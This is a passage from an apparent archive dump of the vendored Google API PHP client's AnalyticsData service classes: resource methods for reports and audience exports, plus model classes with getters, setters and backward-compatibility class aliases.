at beta stability. The intention is to * advance methods to beta stability after some feedback and adoption. To give * your feedback on this API, complete the [Google Analytics Audience Export API * Feedback](https://forms.gle/EeA5u5LW6PEggtCEA) form. (audienceExports.create) * * @param string $parent Required. The parent resource where this audience * export will be created. Format: `properties/{property}` * @param AudienceExport $postBody * @param array $optParams Optional parameters. * @return Operation */ public function create($parent, AudienceExport $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('create', [$params], Operation::class); } /** * Gets configuration metadata about a specific audience export. This method can * be used to understand an audience export after it has been created. See * [Creating an Audience Export](https://developers.google.com/analytics/devguid * es/reporting/data/v1/audience-list-basics) for an introduction to Audience * Exports with examples. Audience Export APIs have some methods at alpha and * other methods at beta stability. The intention is to advance methods to beta * stability after some feedback and adoption. To give your feedback on this * API, complete the [Google Analytics Audience Export API * Feedback](https://forms.gle/EeA5u5LW6PEggtCEA) form. (audienceExports.get) * * @param string $name Required. The audience export resource name. Format: * `properties/{property}/audienceExports/{audience_export}` * @param array $optParams Optional parameters. * @return AudienceExport */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = array_merge($params, $optParams); return $this->call('get', [$params], AudienceExport::class); } /** * Lists all audience exports for a property. This method can be used for you to * find and reuse existing audience exports rather than creating unnecessary new * audience exports. The same audience can have multiple audience exports that * represent the export of users that were in an audience on different days. See * [Creating an Audience Export](https://developers.google.com/analytics/devguid * es/reporting/data/v1/audience-list-basics) for an introduction to Audience * Exports with examples. Audience Export APIs have some methods at alpha and * other methods at beta stability. The intention is to advance methods to beta * stability after some feedback and adoption. To give your feedback on this * API, complete the [Google Analytics Audience Export API * Feedback](https://forms.gle/EeA5u5LW6PEggtCEA) form. * (audienceExports.listPropertiesAudienceExports) * * @param string $parent Required. All audience exports for this property will * be listed in the response. Format: `properties/{property}` * @param array $optParams Optional parameters. * * @opt_param int pageSize Optional. The maximum number of audience exports to * return. The service may return fewer than this value. If unspecified, at most * 200 audience exports will be returned. The maximum value is 1000 (higher * values will be coerced to the maximum). * @opt_param string pageToken Optional. A page token, received from a previous * `ListAudienceExports` call. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `ListAudienceExports` must * match the call that provided the page token. * @return ListAudienceExportsResponse */ public function listPropertiesAudienceExports($parent, $optParams = []) { $params = ['parent' => $parent]; $params = array_merge($params, $optParams); return $this->call('list', [$params], ListAudienceExportsResponse::class); } /** * Retrieves an audience export of users. After creating an audience, the users * are not immediately available for exporting. First, a request to * `CreateAudienceExport` is necessary to create an audience export of users, * and then second, this method is used to retrieve the users in the audience * export. See [Creating an Audience Export](https://developers.google.com/analy * tics/devguides/reporting/data/v1/audience-list-basics) for an introduction to * Audience Exports with examples. Audiences in Google Analytics 4 allow you to * segment your users in the ways that are important to your business. To learn * more, see https://support.google.com/analytics/answer/9267572. Audience * Export APIs have some methods at alpha and other methods at beta stability. * The intention is to advance methods to beta stability after some feedback and * adoption. To give your feedback on this API, complete the [Google Analytics * Audience Export API Feedback](https://forms.gle/EeA5u5LW6PEggtCEA) form. * (audienceExports.query) * * @param string $name Required. The name of the audience export to retrieve * users from. Format: `properties/{property}/audienceExports/{audience_export}` * @param QueryAudienceExportRequest $postBody * @param array $optParams Optional parameters. * @return QueryAudienceExportResponse */ public function query($name, QueryAudienceExportRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('query', [$params], QueryAudienceExportResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PropertiesAudienceExports::class, 'Google_Service_AnalyticsData_Resource_PropertiesAudienceExports'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Resource/Properties.php000064400000025467147600400120025105 0ustar00 * $analyticsdataService = new Google\Service\AnalyticsData(...); * $properties = $analyticsdataService->properties; * */ class Properties extends \Google\Service\Resource { /** * Returns multiple pivot reports in a batch. All reports must be for the same * GA4 Property. (properties.batchRunPivotReports) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). This property must be * specified for the batch. The property within RunPivotReportRequest may either * be unspecified or consistent with this property. Example: properties/1234 * @param BatchRunPivotReportsRequest $postBody * @param array $optParams Optional parameters. * @return BatchRunPivotReportsResponse */ public function batchRunPivotReports($property, BatchRunPivotReportsRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('batchRunPivotReports', [$params], BatchRunPivotReportsResponse::class); } /** * Returns multiple reports in a batch. All reports must be for the same GA4 * Property. (properties.batchRunReports) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). This property must be * specified for the batch. The property within RunReportRequest may either be * unspecified or consistent with this property. Example: properties/1234 * @param BatchRunReportsRequest $postBody * @param array $optParams Optional parameters. * @return BatchRunReportsResponse */ public function batchRunReports($property, BatchRunReportsRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('batchRunReports', [$params], BatchRunReportsResponse::class); } /** * This compatibility method lists dimensions and metrics that can be added to a * report request and maintain compatibility. This method fails if the request's * dimensions and metrics are incompatible. In Google Analytics, reports fail if * they request incompatible dimensions and/or metrics; in that case, you will * need to remove dimensions and/or metrics from the incompatible report until * the report is compatible. The Realtime and Core reports have different * compatibility rules. This method checks compatibility for Core reports. * (properties.checkCompatibility) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. To learn more, see [where to find your Property ID](https * ://developers.google.com/analytics/devguides/reporting/data/v1/property-id). * `property` should be the same value as in your `runReport` request. Example: * properties/1234 * @param CheckCompatibilityRequest $postBody * @param array $optParams Optional parameters. * @return CheckCompatibilityResponse */ public function checkCompatibility($property, CheckCompatibilityRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('checkCompatibility', [$params], CheckCompatibilityResponse::class); } /** * Returns metadata for dimensions and metrics available in reporting methods. * Used to explore the dimensions and metrics. In this method, a Google * Analytics GA4 Property Identifier is specified in the request, and the * metadata response includes Custom dimensions and metrics as well as Universal * metadata. For example if a custom metric with parameter name * `levels_unlocked` is registered to a property, the Metadata response will * contain `customEvent:levels_unlocked`. Universal metadata are dimensions and * metrics applicable to any property such as `country` and `totalUsers`. * (properties.getMetadata) * * @param string $name Required. The resource name of the metadata to retrieve. * This name field is specified in the URL path and not URL parameters. Property * is a numeric Google Analytics GA4 Property identifier. To learn more, see * [where to find your Property ID](https://developers.google.com/analytics/devg * uides/reporting/data/v1/property-id). Example: properties/1234/metadata Set * the Property ID to 0 for dimensions and metrics common to all properties. In * this special mode, this method will not return custom dimensions and metrics. * @param array $optParams Optional parameters. * @return Metadata */ public function getMetadata($name, $optParams = []) { $params = ['name' => $name]; $params = array_merge($params, $optParams); return $this->call('getMetadata', [$params], Metadata::class); } /** * Returns a customized pivot report of your Google Analytics event data. Pivot * reports are more advanced and expressive formats than regular reports. In a * pivot report, dimensions are only visible if they are included in a pivot. * Multiple pivots can be specified to further dissect your data. * (properties.runPivotReport) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). Within a batch request, this * property should either be unspecified or consistent with the batch-level * property. Example: properties/1234 * @param RunPivotReportRequest $postBody * @param array $optParams Optional parameters. * @return RunPivotReportResponse */ public function runPivotReport($property, RunPivotReportRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('runPivotReport', [$params], RunPivotReportResponse::class); } /** * Returns a customized report of realtime event data for your property. Events * appear in realtime reports seconds after they have been sent to the Google * Analytics. Realtime reports show events and usage data for the periods of * time ranging from the present moment to 30 minutes ago (up to 60 minutes for * Google Analytics 360 properties). For a guide to constructing realtime * requests & understanding responses, see [Creating a Realtime Report](https:// * developers.google.com/analytics/devguides/reporting/data/v1/realtime-basics). * (properties.runRealtimeReport) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). Example: properties/1234 * @param RunRealtimeReportRequest $postBody * @param array $optParams Optional parameters. * @return RunRealtimeReportResponse */ public function runRealtimeReport($property, RunRealtimeReportRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('runRealtimeReport', [$params], RunRealtimeReportResponse::class); } /** * Returns a customized report of your Google Analytics event data. Reports * contain statistics derived from data collected by the Google Analytics * tracking code. The data returned from the API is as a table with columns for * the requested dimensions and metrics. Metrics are individual measurements of * user activity on your property, such as active users or event count. * Dimensions break down metrics across some common criteria, such as country or * event name. For a guide to constructing requests & understanding responses, * see [Creating a Report](https://developers.google.com/analytics/devguides/rep * orting/data/v1/basics). (properties.runReport) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). Within a batch request, this * property should either be unspecified or consistent with the batch-level * property. Example: properties/1234 * @param RunReportRequest $postBody * @param array $optParams Optional parameters. * @return RunReportResponse */ public function runReport($property, RunReportRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('runReport', [$params], RunReportResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Properties::class, 'Google_Service_AnalyticsData_Resource_Properties'); google-api/vendor/google/apiclient-services/src/AnalyticsData/DimensionValue.php000064400000002106147600400120024065 0ustar00value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DimensionValue::class, 'Google_Service_AnalyticsData_DimensionValue'); google-api/vendor/google/apiclient-services/src/AnalyticsData/SamplingMetadata.php000064400000002736147600400120024367 0ustar00samplesReadCount = $samplesReadCount; } /** * @return string */ public function getSamplesReadCount() { return $this->samplesReadCount; } /** * @param string */ public function setSamplingSpaceSize($samplingSpaceSize) { $this->samplingSpaceSize = $samplingSpaceSize; } /** * @return string */ public function getSamplingSpaceSize() { return $this->samplingSpaceSize; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SamplingMetadata::class, 'Google_Service_AnalyticsData_SamplingMetadata'); google-api/vendor/google/apiclient-services/src/AnalyticsData/PivotSelection.php000064400000002656147600400120024124 0ustar00dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } /** * @param string */ public function setDimensionValue($dimensionValue) { $this->dimensionValue = $dimensionValue; } /** * @return string */ public function getDimensionValue() { return $this->dimensionValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PivotSelection::class, 'Google_Service_AnalyticsData_PivotSelection'); google-api/vendor/google/apiclient-services/src/AnalyticsData/DimensionOrderBy.php000064400000002621147600400120024361 0ustar00dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } /** * @param string */ public function setOrderType($orderType) { $this->orderType = $orderType; } /** * @return string */ public function getOrderType() { return $this->orderType; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DimensionOrderBy::class, 'Google_Service_AnalyticsData_DimensionOrderBy'); google-api/vendor/google/apiclient-services/src/AnalyticsData/ActiveMetricRestriction.php000064400000003047147600400120025755 0ustar00metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } /** * @param string[] */ public function setRestrictedMetricTypes($restrictedMetricTypes) { $this->restrictedMetricTypes = $restrictedMetricTypes; } /** * @return string[] */ public function getRestrictedMetricTypes() { return $this->restrictedMetricTypes; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ActiveMetricRestriction::class, 'Google_Service_AnalyticsData_ActiveMetricRestriction'); google-api/vendor/google/apiclient-services/src/AnalyticsData/SchemaRestrictionResponse.php000064400000002751147600400120026316 0ustar00activeMetricRestrictions = $activeMetricRestrictions; } /** * @return ActiveMetricRestriction[] */ public function getActiveMetricRestrictions() { return $this->activeMetricRestrictions; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SchemaRestrictionResponse::class, 'Google_Service_AnalyticsData_SchemaRestrictionResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Pivot.php000064400000004442147600400120022251 0ustar00fieldNames = $fieldNames; } /** * @return string[] */ public function getFieldNames() { return $this->fieldNames; } /** * @param string */ public function setLimit($limit) { $this->limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param string[] */ public function setMetricAggregations($metricAggregations) { $this->metricAggregations = $metricAggregations; } /** * @return string[] */ public function getMetricAggregations() { return $this->metricAggregations; } /** * @param string */ public function setOffset($offset) { $this->offset = $offset; } /** * @return string */ public function getOffset() { return $this->offset; } /** * @param OrderBy[] */ public function setOrderBys($orderBys) { $this->orderBys = $orderBys; } /** * @return OrderBy[] */ public function getOrderBys() { return $this->orderBys; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Pivot::class, 'Google_Service_AnalyticsData_Pivot'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Dimension.php000064400000003060147600400120023070 0ustar00dimensionExpression = $dimensionExpression; } /** * @return DimensionExpression */ public function getDimensionExpression() { return $this->dimensionExpression; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Dimension::class, 'Google_Service_AnalyticsData_Dimension'); google-api/vendor/google/apiclient-services/src/AnalyticsData/AudienceExport.php000064400000007506147600400120024073 0ustar00audience = $audience; } /** * @return string */ public function getAudience() { return $this->audience; } /** * @param string */ public function setAudienceDisplayName($audienceDisplayName) { $this->audienceDisplayName = $audienceDisplayName; } /** * @return string */ public function getAudienceDisplayName() { return $this->audienceDisplayName; } /** * @param string */ public function setBeginCreatingTime($beginCreatingTime) { $this->beginCreatingTime = $beginCreatingTime; } /** * @return string */ public function getBeginCreatingTime() { return $this->beginCreatingTime; } /** * @param int */ public function setCreationQuotaTokensCharged($creationQuotaTokensCharged) { $this->creationQuotaTokensCharged = $creationQuotaTokensCharged; } /** * @return int */ public function getCreationQuotaTokensCharged() { return $this->creationQuotaTokensCharged; } /** * @param V1betaAudienceDimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return V1betaAudienceDimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setErrorMessage($errorMessage) { $this->errorMessage = $errorMessage; } /** * @return string */ public function getErrorMessage() { return $this->errorMessage; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } public function setPercentageCompleted($percentageCompleted) { $this->percentageCompleted = $percentageCompleted; } public function getPercentageCompleted() { return $this->percentageCompleted; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AudienceExport::class, 'Google_Service_AnalyticsData_AudienceExport'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Row.php000064400000003276147600400120021723 0ustar00dimensionValues = $dimensionValues; } /** * @return DimensionValue[] */ public function getDimensionValues() { return $this->dimensionValues; } /** * @param MetricValue[] */ public function setMetricValues($metricValues) { $this->metricValues = $metricValues; } /** * @return MetricValue[] */ public function getMetricValues() { return $this->metricValues; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Row::class, 'Google_Service_AnalyticsData_Row'); google-api/vendor/google/apiclient-services/src/AnalyticsData/NumericValue.php000064400000002442147600400120023545 0ustar00doubleValue = $doubleValue; } public function getDoubleValue() { return $this->doubleValue; } /** * @param string */ public function setInt64Value($int64Value) { $this->int64Value = $int64Value; } /** * @return string */ public function getInt64Value() { return $this->int64Value; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(NumericValue::class, 'Google_Service_AnalyticsData_NumericValue'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Status.php000064400000003115147600400120022427 0ustar00code = $code; } /** * @return int */ public function getCode() { return $this->code; } /** * @param array[] */ public function setDetails($details) { $this->details = $details; } /** * @return array[] */ public function getDetails() { return $this->details; } /** * @param string */ public function setMessage($message) { $this->message = $message; } /** * @return string */ public function getMessage() { return $this->message; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Status::class, 'Google_Service_AnalyticsData_Status'); google-api/vendor/google/apiclient-services/src/AnalyticsData/DateRange.php000064400000003074147600400120023002 0ustar00endDate = $endDate; } /** * @return string */ public function getEndDate() { return $this->endDate; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setStartDate($startDate) { $this->startDate = $startDate; } /** * @return string */ public function getStartDate() { return $this->startDate; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DateRange::class, 'Google_Service_AnalyticsData_DateRange'); google-api/vendor/google/apiclient-services/src/AnalyticsData/QuotaStatus.php000064400000002515147600400120023444 0ustar00consumed = $consumed; } /** * @return int */ public function getConsumed() { return $this->consumed; } /** * @param int */ public function setRemaining($remaining) { $this->remaining = $remaining; } /** * @return int */ public function getRemaining() { return $this->remaining; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(QuotaStatus::class, 'Google_Service_AnalyticsData_QuotaStatus'); google-api/vendor/google/apiclient-services/src/AnalyticsData/RunReportRequest.php000064400000013025147600400120024456 0ustar00cohortSpec = $cohortSpec; } /** * @return CohortSpec */ public function getCohortSpec() { return $this->cohortSpec; } /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param DateRange[] */ public function setDateRanges($dateRanges) { $this->dateRanges = $dateRanges; } /** * @return DateRange[] */ public function getDateRanges() { return $this->dateRanges; } /** * @param FilterExpression */ public function setDimensionFilter(FilterExpression $dimensionFilter) { $this->dimensionFilter = $dimensionFilter; } /** * @return FilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param bool */ public function setKeepEmptyRows($keepEmptyRows) { $this->keepEmptyRows = $keepEmptyRows; } /** * @return bool */ public function getKeepEmptyRows() { return $this->keepEmptyRows; } /** * @param string */ public function setLimit($limit) { $this->limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param string[] */ public function setMetricAggregations($metricAggregations) { $this->metricAggregations = $metricAggregations; } /** * @return string[] */ public function getMetricAggregations() { return $this->metricAggregations; } /** * @param FilterExpression */ public function setMetricFilter(FilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return FilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } /** * @param string */ public function setOffset($offset) { $this->offset = $offset; } /** * @return string */ public function getOffset() { return $this->offset; } /** * @param OrderBy[] */ public function setOrderBys($orderBys) { $this->orderBys = $orderBys; } /** * @return OrderBy[] */ public function getOrderBys() { return $this->orderBys; } /** * @param string */ public function setProperty($property) { $this->property = $property; } /** * @return string */ public function getProperty() { return $this->property; } /** * @param bool */ public function setReturnPropertyQuota($returnPropertyQuota) { $this->returnPropertyQuota = $returnPropertyQuota; } /** * @return bool */ public function getReturnPropertyQuota() { return $this->returnPropertyQuota; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RunReportRequest::class, 'Google_Service_AnalyticsData_RunReportRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsData/BetweenFilter.php000064400000003106147600400120023703 0ustar00fromValue = $fromValue; } /** * @return NumericValue */ public function getFromValue() { return $this->fromValue; } /** * @param NumericValue */ public function setToValue(NumericValue $toValue) { $this->toValue = $toValue; } /** * @return NumericValue */ public function getToValue() { return $this->toValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(BetweenFilter::class, 'Google_Service_AnalyticsData_BetweenFilter'); google-api/vendor/google/apiclient-services/src/AnalyticsData/PivotHeader.php000064400000003222147600400120023355 0ustar00pivotDimensionHeaders = $pivotDimensionHeaders; } /** * @return PivotDimensionHeader[] */ public function getPivotDimensionHeaders() { return $this->pivotDimensionHeaders; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PivotHeader::class, 'Google_Service_AnalyticsData_PivotHeader'); google-api/vendor/google/apiclient-services/src/AnalyticsData/AudienceListMetadata.php000064400000001546147600400120025164 0ustar00concurrentRequests = $concurrentRequests; } /** * @return QuotaStatus */ public function getConcurrentRequests() { return $this->concurrentRequests; } /** * @param QuotaStatus */ public function setPotentiallyThresholdedRequestsPerHour(QuotaStatus $potentiallyThresholdedRequestsPerHour) { $this->potentiallyThresholdedRequestsPerHour = $potentiallyThresholdedRequestsPerHour; } /** * @return QuotaStatus */ public function getPotentiallyThresholdedRequestsPerHour() { return $this->potentiallyThresholdedRequestsPerHour; } /** * @param QuotaStatus */ public function setServerErrorsPerProjectPerHour(QuotaStatus $serverErrorsPerProjectPerHour) { $this->serverErrorsPerProjectPerHour = $serverErrorsPerProjectPerHour; } /** * @return QuotaStatus */ public function getServerErrorsPerProjectPerHour() { return $this->serverErrorsPerProjectPerHour; } /** * @param QuotaStatus */ public function setTokensPerDay(QuotaStatus $tokensPerDay) { $this->tokensPerDay = $tokensPerDay; } /** * @return QuotaStatus */ public function getTokensPerDay() { return $this->tokensPerDay; } /** * @param QuotaStatus */ public function setTokensPerHour(QuotaStatus $tokensPerHour) { $this->tokensPerHour = $tokensPerHour; } /** * @return QuotaStatus */ public function getTokensPerHour() { return $this->tokensPerHour; } /** * @param QuotaStatus */ public function setTokensPerProjectPerHour(QuotaStatus $tokensPerProjectPerHour) { $this->tokensPerProjectPerHour = $tokensPerProjectPerHour; } /** * @return QuotaStatus */ public function getTokensPerProjectPerHour() { return $this->tokensPerProjectPerHour; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PropertyQuota::class, 'Google_Service_AnalyticsData_PropertyQuota'); google-api/vendor/google/apiclient-services/src/AnalyticsData/BatchRunReportsResponse.php000064400000003013147600400120025745 0ustar00kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param RunReportResponse[] */ public function setReports($reports) { $this->reports = $reports; } /** * @return RunReportResponse[] */ public function getReports() { return $this->reports; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(BatchRunReportsResponse::class, 'Google_Service_AnalyticsData_BatchRunReportsResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsData/RunPivotReportRequest.php000064400000011315147600400120025500 0ustar00cohortSpec = $cohortSpec; } /** * @return CohortSpec */ public function getCohortSpec() { return $this->cohortSpec; } /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param DateRange[] */ public function setDateRanges($dateRanges) { $this->dateRanges = $dateRanges; } /** * @return DateRange[] */ public function getDateRanges() { return $this->dateRanges; } /** * @param FilterExpression */ public function setDimensionFilter(FilterExpression $dimensionFilter) { $this->dimensionFilter = $dimensionFilter; } /** * @return FilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param bool */ public function setKeepEmptyRows($keepEmptyRows) { $this->keepEmptyRows = $keepEmptyRows; } /** * @return bool */ public function getKeepEmptyRows() { return $this->keepEmptyRows; } /** * @param FilterExpression */ public function setMetricFilter(FilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return FilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } /** * @param Pivot[] */ public function setPivots($pivots) { $this->pivots = $pivots; } /** * @return Pivot[] */ public function getPivots() { return $this->pivots; } /** * @param string */ public function setProperty($property) { $this->property = $property; } /** * @return string */ public function getProperty() { return $this->property; } /** * @param bool */ public function setReturnPropertyQuota($returnPropertyQuota) { $this->returnPropertyQuota = $returnPropertyQuota; } /** * @return bool */ public function getReturnPropertyQuota() { return $this->returnPropertyQuota; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RunPivotReportRequest::class, 'Google_Service_AnalyticsData_RunPivotReportRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsData/QueryAudienceExportRequest.php000064400000002542147600400120026465 0ustar00limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param string */ public function setOffset($offset) { $this->offset = $offset; } /** * @return string */ public function getOffset() { return $this->offset; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(QueryAudienceExportRequest::class, 'Google_Service_AnalyticsData_QueryAudienceExportRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsData/V1betaAudienceDimension.php000064400000002231147600400120025570 0ustar00dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(V1betaAudienceDimension::class, 'Google_Service_AnalyticsData_V1betaAudienceDimension'); google-api/vendor/google/apiclient-services/src/AnalyticsData/InListFilter.php000064400000002635147600400120023522 0ustar00caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string[] */ public function setValues($values) { $this->values = $values; } /** * @return string[] */ public function getValues() { return $this->values; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(InListFilter::class, 'Google_Service_AnalyticsData_InListFilter'); google-api/vendor/google/apiclient-services/src/AnalyticsData/CohortsRange.php000064400000003200147600400120023535 0ustar00endOffset = $endOffset; } /** * @return int */ public function getEndOffset() { return $this->endOffset; } /** * @param string */ public function setGranularity($granularity) { $this->granularity = $granularity; } /** * @return string */ public function getGranularity() { return $this->granularity; } /** * @param int */ public function setStartOffset($startOffset) { $this->startOffset = $startOffset; } /** * @return int */ public function getStartOffset() { return $this->startOffset; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CohortsRange::class, 'Google_Service_AnalyticsData_CohortsRange'); google-api/vendor/google/apiclient-services/src/AnalyticsData/MetricOrderBy.php000064400000002146147600400120023661 0ustar00metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetricOrderBy::class, 'Google_Service_AnalyticsData_MetricOrderBy'); google-api/vendor/google/apiclient-services/src/AnalyticsData/FilterExpression.php000064400000004633147600400120024457 0ustar00andGroup = $andGroup; } /** * @return FilterExpressionList */ public function getAndGroup() { return $this->andGroup; } /** * @param Filter */ public function setFilter(Filter $filter) { $this->filter = $filter; } /** * @return Filter */ public function getFilter() { return $this->filter; } /** * @param FilterExpression */ public function setNotExpression(FilterExpression $notExpression) { $this->notExpression = $notExpression; } /** * @return FilterExpression */ public function getNotExpression() { return $this->notExpression; } /** * @param FilterExpressionList */ public function setOrGroup(FilterExpressionList $orGroup) { $this->orGroup = $orGroup; } /** * @return FilterExpressionList */ public function getOrGroup() { return $this->orGroup; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(FilterExpression::class, 'Google_Service_AnalyticsData_FilterExpression'); google-api/vendor/google/apiclient-services/src/AnalyticsData/ConcatenateExpression.php000064400000002742147600400120025455 0ustar00delimiter = $delimiter; } /** * @return string */ public function getDelimiter() { return $this->delimiter; } /** * @param string[] */ public function setDimensionNames($dimensionNames) { $this->dimensionNames = $dimensionNames; } /** * @return string[] */ public function getDimensionNames() { return $this->dimensionNames; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ConcatenateExpression::class, 'Google_Service_AnalyticsData_ConcatenateExpression'); google-api/vendor/google/apiclient-services/src/AnalyticsData/RunRealtimeReportRequest.php000064400000010202147600400120026133 0ustar00dimensionFilter = $dimensionFilter; } /** * @return FilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setLimit($limit) { $this->limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param string[] */ public function setMetricAggregations($metricAggregations) { $this->metricAggregations = $metricAggregations; } /** * @return string[] */ public function getMetricAggregations() { return $this->metricAggregations; } /** * @param FilterExpression */ public function setMetricFilter(FilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return FilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } /** * @param MinuteRange[] */ public function setMinuteRanges($minuteRanges) { $this->minuteRanges = $minuteRanges; } /** * @return MinuteRange[] */ public function getMinuteRanges() { return $this->minuteRanges; } /** * @param OrderBy[] */ public function setOrderBys($orderBys) { $this->orderBys = $orderBys; } /** * @return OrderBy[] */ public function getOrderBys() { return $this->orderBys; } /** * @param bool */ public function setReturnPropertyQuota($returnPropertyQuota) { $this->returnPropertyQuota = $returnPropertyQuota; } 